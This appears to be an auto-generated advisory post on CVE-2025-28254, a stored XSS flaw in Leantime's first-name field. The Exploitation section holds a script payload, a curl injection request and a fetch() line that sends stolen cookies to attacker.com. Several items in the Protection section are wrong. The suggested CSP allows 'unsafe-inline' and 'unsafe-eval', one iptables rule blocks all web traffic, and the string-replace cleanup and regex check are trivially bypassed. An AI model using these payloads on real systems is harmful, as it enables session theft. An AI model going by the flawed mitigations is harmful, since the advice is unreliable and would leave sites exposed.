Leantime, Cross-Site Scripting (XSS), CVE-2025-28254 (Critical)

By /

How CVE-2025-28254 Works

CVE-2025-28254 is a stored Cross-Site Scripting (XSS) vulnerability in Leantime v3.2.1 and prior. The flaw exists in the `processMentions()` function, which fails to sanitize user-supplied input in the first name field. An authenticated attacker can inject malicious JavaScript payloads, which are then executed when other users view the manipulated content. This allows arbitrary code execution in the victim’s browser context, leading to session hijacking, data theft, or unauthorized actions. The vulnerability stems from improper input validation and output encoding, making it exploitable via simple POST requests.

DailyCVE Form

Platform: Leantime
Version: ≤ 3.2.1
Vulnerability: Stored XSS
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation

1. Payload Injection:

<script>alert(document.cookie)</script>

Inserted into the first name field during profile update or mention creation.

2. CURL Exploit:

curl -X POST -d "firstName=<script>malicious_code</script>" http://leantime/api/processMentions --cookie "sessionid=ATTACKER_SESSION"

3. Exfiltrate Data:

fetch('https://attacker.com/steal?data=' + btoa(document.cookie));

Protection

1. Input Sanitization:

$firstName = htmlspecialchars($_POST['firstName'], ENT_QUOTES, 'UTF-8');

2. Content Security Policy (CSP):

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'

3. Patch Upgrade:

composer update leantime/leantime

4. WAF Rules:

location /api/ {
modsecurity_rules 'SecRule ARGS "@detectXSS" deny';
}

5. Session Hardening:

ini_set('session.cookie_httponly', 1);
ini_set('session.cookie_secure', 1);

6. Output Encoding:

{{ user.firstName | escape('js') }}

7. Logging Suspicious Activity:

grep -r "script>" /var/log/leantime/access.log

8. Exploit Detection:

if re.search(r'<script.?>', input_string):
raise ValueError("XSS Attempt Blocked")

9. Backup Mitigation:

UPDATE users SET firstName = REPLACE(firstName, '<script>', '') WHERE firstName LIKE '%<%';

10. Network Isolation:

iptables -A INPUT -p tcp --dport 80 -j DROP

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28254
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top